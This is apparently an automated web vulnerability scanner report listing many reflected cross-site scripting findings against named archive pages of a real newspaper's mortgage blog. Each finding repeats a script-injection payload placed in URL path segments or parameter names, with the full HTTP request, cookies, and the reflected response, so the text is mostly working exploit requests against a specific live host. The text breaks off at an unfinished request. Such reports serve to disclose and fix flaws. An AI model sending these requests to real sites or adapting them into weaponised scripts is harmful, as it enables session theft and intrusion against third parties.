HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:08:35 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 99645
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52dcb"><script>alert(1)</script>39ced908d26 was submitted in the REST URL parameter 1. This input was echoed as 52dcb\"><script>alert(1)</script>39ced908d26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /200752dcb"><script>alert(1)</script>39ced908d26/02/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:55 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:55 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200752dcb\"><script>alert(1)</script>39ced908d26/02/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b0a6"><script>alert(1)</script>92197aa8e9d was submitted in the REST URL parameter 2. This input was echoed as 6b0a6\"><script>alert(1)</script>92197aa8e9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/026b0a6"><script>alert(1)</script>92197aa8e9d/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:15:06 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:15:06 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/026b0a6\"><script>alert(1)</script>92197aa8e9d/feed/" /> ...[SNIP]...
1.212. http://mortgage.ocregister.com/2007/02/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2007/02/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3653d"><script>alert(1)</script>5061bfdeb82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3653d\"><script>alert(1)</script>5061bfdeb82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/02/?3653d"><script>alert(1)</script>5061bfdeb82=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:50 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 82182
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 February - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/02/?3653d\"><script>alert(1)</script>5061bfdeb82=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b96d6"><script>alert(1)</script>608b7c95f14 was submitted in the REST URL parameter 1. This input was echoed as b96d6\"><script>alert(1)</script>608b7c95f14 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007b96d6"><script>alert(1)</script>608b7c95f14/03/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:46 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:46 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007b96d6\"><script>alert(1)</script>608b7c95f14/03/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 832cb"><script>alert(1)</script>2b5aea2aeb2 was submitted in the REST URL parameter 2. This input was echoed as 832cb\"><script>alert(1)</script>2b5aea2aeb2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/03832cb"><script>alert(1)</script>2b5aea2aeb2/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:51 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:52 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/03832cb\"><script>alert(1)</script>2b5aea2aeb2/feed/" /> ...[SNIP]...
1.215. http://mortgage.ocregister.com/2007/03/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2007/03/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10aad"><script>alert(1)</script>8ad5229eab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 10aad\"><script>alert(1)</script>8ad5229eab7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/03/?10aad"><script>alert(1)</script>8ad5229eab7=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:43 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 86849
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 March - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/03/?10aad\"><script>alert(1)</script>8ad5229eab7=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55996"><script>alert(1)</script>f21c39f9bf3 was submitted in the REST URL parameter 1. This input was echoed as 55996\"><script>alert(1)</script>f21c39f9bf3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /200755996"><script>alert(1)</script>f21c39f9bf3/04/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:44 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:44 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200755996\"><script>alert(1)</script>f21c39f9bf3/04/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96ffb"><script>alert(1)</script>43052a33670 was submitted in the REST URL parameter 2. This input was echoed as 96ffb\"><script>alert(1)</script>43052a33670 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/0496ffb"><script>alert(1)</script>43052a33670/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:47 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:47 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/0496ffb\"><script>alert(1)</script>43052a33670/feed/" /> ...[SNIP]...
1.218. http://mortgage.ocregister.com/2007/04/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2007/04/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74dd0"><script>alert(1)</script>2eca39d79aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 74dd0\"><script>alert(1)</script>2eca39d79aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/04/?74dd0"><script>alert(1)</script>2eca39d79aa=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:42 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 86567
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 April - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/04/?74dd0\"><script>alert(1)</script>2eca39d79aa=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a5d1"><script>alert(1)</script>84bac8fb2df was submitted in the REST URL parameter 1. This input was echoed as 7a5d1\"><script>alert(1)</script>84bac8fb2df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20077a5d1"><script>alert(1)</script>84bac8fb2df/05/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:45 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:50 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20077a5d1\"><script>alert(1)</script>84bac8fb2df/05/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5186"><script>alert(1)</script>5f95e6db221 was submitted in the REST URL parameter 2. This input was echoed as e5186\"><script>alert(1)</script>5f95e6db221 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/05e5186"><script>alert(1)</script>5f95e6db221/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:15:04 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:15:04 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/05e5186\"><script>alert(1)</script>5f95e6db221/feed/" /> ...[SNIP]...
1.221. http://mortgage.ocregister.com/2007/05/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2007/05/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb37e"><script>alert(1)</script>c34013ed727 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cb37e\"><script>alert(1)</script>c34013ed727 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/05/?cb37e"><script>alert(1)</script>c34013ed727=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:41 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 83696
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 May - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/05/?cb37e\"><script>alert(1)</script>c34013ed727=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d840"><script>alert(1)</script>d1f9139be71 was submitted in the REST URL parameter 1. This input was echoed as 4d840\"><script>alert(1)</script>d1f9139be71 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20074d840"><script>alert(1)</script>d1f9139be71/06/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:46 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:47 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20074d840\"><script>alert(1)</script>d1f9139be71/06/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a890"><script>alert(1)</script>7c589308949 was submitted in the REST URL parameter 2. This input was echoed as 2a890\"><script>alert(1)</script>7c589308949 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/062a890"><script>alert(1)</script>7c589308949/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:50 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:51 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/062a890\"><script>alert(1)</script>7c589308949/feed/" /> ...[SNIP]...
1.224. http://mortgage.ocregister.com/2007/06/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2007/06/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 194ec"><script>alert(1)</script>237ccbfc119 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 194ec\"><script>alert(1)</script>237ccbfc119 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/06/?194ec"><script>alert(1)</script>237ccbfc119=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:40 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 81912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 June - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/06/?194ec\"><script>alert(1)</script>237ccbfc119=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d23d"><script>alert(1)</script>6e84ace3326 was submitted in the REST URL parameter 1. This input was echoed as 8d23d\"><script>alert(1)</script>6e84ace3326 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
